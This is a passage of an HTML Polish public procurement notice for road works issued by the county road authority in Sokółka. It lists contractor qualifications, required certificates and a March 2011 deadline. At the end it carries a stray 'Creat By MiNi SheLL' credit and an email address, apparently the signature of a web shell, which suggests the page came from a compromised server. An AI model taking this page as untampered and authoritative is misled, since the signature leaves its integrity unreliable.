- samochody samowyładowcze z przykryciem brezentowym lub termosy,
b)	posiadać zakładowy system kontroli produkcji oparty na odpowiednich normach europejskich. 
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał kadrowy): wskaże do [wykonania / uczestniczenia w wykonaniu] niniejszego zamówienia następujące [osoby / podmioty], właściwe do realizacji określonych czynności, które posiadają określone kwalifikacje, niezbędne do wykonania zamówienia:
- dysponować w trakcie realizacji zadania kierownikiem budowy z nie mniej niż trzyletnim doświadczeniem na tym stanowisku, posiadającym uprawnienia w specjalności drogowej niezbędne do wykonywania przedmiotu zamówienia - wymagane przepisami prawa oraz należącym do właściwej Okręgowej Izby Inżynierów Budownictwa jeżeli wymagają tego przepisy prawa.
- dysponować w trakcie realizacji zadania obsługą geodezyjną - geodeta z uprawnieniami zgodnie z obowiązującym prawem. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia przez wykonawcę sytuacji ekonomicznej i finansowej Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa):
- wykonawca osiągnął w pracach budowlanych (drogowych) w ciągu ostatnich 3lat roczny obrót równy, co najmniej kwocie 8 000 000,00PLN,
- posiadać środki finansowe lub zdolność kredytową, z uwzględnieniem potrącenia na inne zobowiązania umowne w wysokości, co najmniej 1 600 000,00PLN,
- posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełniania przedstawionionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dodatkowo do oferty należy załączyć:
a)	parafowany formularz projektu umowy - dokument ten powinien zostać parafowany przez osobę upoważnioną do występowania w imieniu Wykonawcy bądź też, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przez ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia;
b)	parafowany formularz karty gwarancyjnej - dokument ten powinien zostać parafowany przez osobę upoważnioną do występowania w imieniu Wykonawcy bądź też, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przez ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia;
c)	kosztorysy ofertowe;
d)	pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą;
e)	pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożnością dotrzymania terminu określonego w umowie, termin ten może ulec przedłużeniu, nie więcej jednak, niż o czas trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdsokolka.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Sokółce, ul. Torowa 12, 16-100 Sokółka, pokój nr 26. Koszt - 200,00PLN..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2011 godzina 10:00, miejsce: Powiatowy Zarząd Dróg w Sokółce, ul. Torowa 12, 16-100 Sokółka, pokój nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com